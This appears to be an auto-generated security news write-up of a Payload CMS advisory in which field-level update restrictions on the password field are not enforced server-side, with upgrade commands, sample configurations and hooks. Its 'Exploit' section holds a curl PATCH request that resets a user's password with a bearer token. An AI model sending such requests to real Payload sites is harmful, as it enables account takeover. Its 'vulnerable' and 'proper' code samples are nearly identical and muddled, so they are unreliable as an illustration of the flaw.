Listen to this Post
Payload CMS is a free and open-source headless content management system that allows developers to define authentication collections with field-level access control. In versions before 3.90.0 and canary versions before 4.0.0-canary.34, the server fails to enforce a field-level `access.update` restriction on the `password` field of an authentication collection. When a developer configures an auth collection with a field-level `access.update` restriction on the password field—intending to prevent certain users or roles from changing passwords—the restriction is not applied on the server side. This means that any user who can update the collection’s documents can also update the password field, bypassing the intended access control. The vulnerability is classified as CWE-284 (Improper Access Control) and has a CVSS 4.0 base score of 7.6, indicating high severity. The attack vector is network-based, with low attack complexity and low privileges required, though attack requirements are present. The vulnerability allows unauthorized updates to the password field, which can lead to privilege escalation, account takeover, or unauthorized access to user accounts. The issue was fixed in versions 3.90.0 and 4.0.0-canary.34, and users are advised to upgrade their Payload packages accordingly. A commit addressing the issue is available in the Payload repository. The advisory was published on September 18, 2026, and reviewed by GitHub on October 6, 2026. This vulnerability highlights the importance of proper server-side enforcement of field-level access controls in headless CMS platforms.
DailyCVE Form:
Platform: Payload CMS
Version: < 3.90.0
Vulnerability: Improper Access Control
Severity: High
date: 2026-09-18
Prediction: 2026-10-06
What Undercode Say:
Check if Payload is affected npm list payload Verify the installed version cat node_modules/payload/package.json | grep version Upgrade to patched version npm install [email protected]
// Example of a vulnerable auth collection configuration
const Users = {
slug: 'users',
auth: true,
fields: [
{
name: 'password',
type: 'text',
access: {
update: ({ req }) => req.user.role === 'admin'
}
}
]
};
// Example of a proper server-side check
const passwordField = {
name: 'password',
type: 'text',
access: {
update: ({ req }) => {
if (!req.user || req.user.role !== 'admin') {
return false;
}
return true;
}
}
};
Exploit: (Educational Purposes!)
Authenticated user with update access to the collection
curl -X PATCH http://localhost:3000/api/users/123 \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <user_token>" \
-d '{"password": "newpassword123"}'
// Server-side code that fails to enforce the restriction
async function updateUser(req, res) {
const user = await payload.update({
collection: 'users',
id: req.params.id,
data: req.body,
});
res.json(user);
}
Protection: from this CVE
Upgrade to the patched version npm install [email protected]
For canary users npm install [email protected]
// Implement a custom access control function
const passwordField = {
name: 'password',
type: 'text',
access: {
update: ({ req }) => {
return req.user?.role === 'admin';
}
}
};
// Add a beforeValidate hook as an additional safeguard
const Users = {
slug: 'users',
auth: true,
hooks: {
beforeValidate: [
({ data, req, operation }) => {
if (operation === 'update' && data.password) {
if (!req.user || req.user.role !== 'admin') {
throw new Error('Unauthorized password update');
}
}
return data;
}
]
}
};
Impact:
An authenticated attacker with update access to an auth collection can change the password of any user, including administrators, without the intended field-level restriction. This leads to privilege escalation, account takeover, and potential full compromise of the CMS. The vulnerability has a high confidentiality and integrity impact, as unauthorized users can access and modify sensitive account data.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

